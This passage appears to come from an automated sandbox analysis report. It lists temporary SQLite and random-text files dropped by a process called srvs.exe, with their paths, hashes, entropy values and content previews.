                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp9948.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp9949.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp994A.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp997A.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                              Entropy (8bit):0.6970840431455908
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                              MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                              SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                              SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                              SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp997B.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                              Entropy (8bit):0.6970840431455908
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                              MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                              SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                              SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                              SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA48F.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.685942106278079
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                              MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                              SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                              SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                              SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA490.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.6969712158039245
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                              MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                              SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                              SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                              SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C0.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.702247102869977
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C1.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.69422273140364
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C2.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.685942106278079
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                              MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                              SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                              SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                              SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C3.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.6969712158039245
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                              MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                              SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                              SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                              SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C4.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.702247102869977
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpA4C5.tmp
